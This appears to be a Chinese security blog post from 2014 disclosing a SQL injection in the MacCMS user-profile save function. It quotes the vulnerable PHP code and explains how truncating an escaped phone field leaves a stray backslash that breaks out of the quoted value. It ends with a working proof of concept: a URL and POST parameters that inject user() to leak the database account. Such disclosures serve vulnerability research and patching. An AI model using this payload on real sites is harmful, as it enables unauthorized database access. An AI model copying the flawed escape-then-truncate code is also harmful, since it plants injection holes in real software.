时间:2014-12-3 作者:admin 分类: 技术交流
在文件/inc/module/user.php中:
elseif($method=='save')
{
chklogin();
$oldpass = be("post","u_oldpass");
$password1 = be("post","u_password1");
$password2 = be("post","u_password2");
$u_qq= be("post","u_qq");
$u_email = be("post","u_email");
$u_phone = be("post","u_phone");
$u_question = be("post","u_question");
$u_answer = be("post","u_email");
if(empty($password1) || empty($u_email)){
alert ("表单信息不完整,请重填!"); exit;
}
if (strlen($u_email)>32) { $u_email = substring($u_email,32);}
if (strlen($u_qq)>16) { $u_qq = substring($u_qq,16);}
if (strlen($u_phone)>16) { $u_phone = substring($u_phone,16);}
$col = array("u_qq","u_email","u_phone","u_question","u_answer");
$val = array($u_qq,$u_email,$u_phone,$u_question,$u_answer);
if ($password1 != ""){
if ($password1 != $password2){ alert ("两次密码不同");exit; }
$password1 = md5($password1);
array_push($col,"u_password");
array_push($val,$password1);
}
$db->Update ("{pre}user",$col ,$val ,"u_id=".$user["u_id"]);
alertUrl ("修改成功!","index.php?m=user-info.html");
}
if (strlen($u_email)>32) { $u_email = substring($u_email,32);}
if (strlen($u_qq)>16) { $u_qq = substring($u_qq,16);}
if (strlen($u_phone)>16) { $u_phone = substring($u_phone,16);}
这里面存在着字符串截断的操作,利用这个截断功能,可以将转义后的内容\ 变成\
这里执行的sql语句:
UPDATE mac_user SET u_qq='$u_qq',u_email='$u_email',u_phone='$u_phone',u_question='$u_question',u_answer='$u_answer',u_password='$u_password' WHERE u_id=1
其中$u_phone的长度为16. 这样我们设置$u_phone=123456789012345\ 转移再截断前16位,$u_phone的值是一样的。
这时候sql语句就变成
UPDATE mac_user SET u_qq='$u_qq',u_email='$u_email',u_phone='123456789012345\',u_question='$u_question',u_answer='$u_answer',u_password='$u_password' WHERE u_id=1
也就是将u_phone的值set成 123456789012345',u_question=。
接下来只要将$u_question设置成 ,injectsql#这种格式就可以实现sql注入了。
poc:
URL: maccms/index.php?m=user-save.html(需要登录)
post参数: u_password1=123456&u_password2=123456&u_qq=12345678&u_email=test%40gmail.com&u_phone=123456789012345\&u_question=,u_question=user()%23&u_answer=123456
访问后即可看到 找回密码问题 这一列已经显示了数据库当前账号
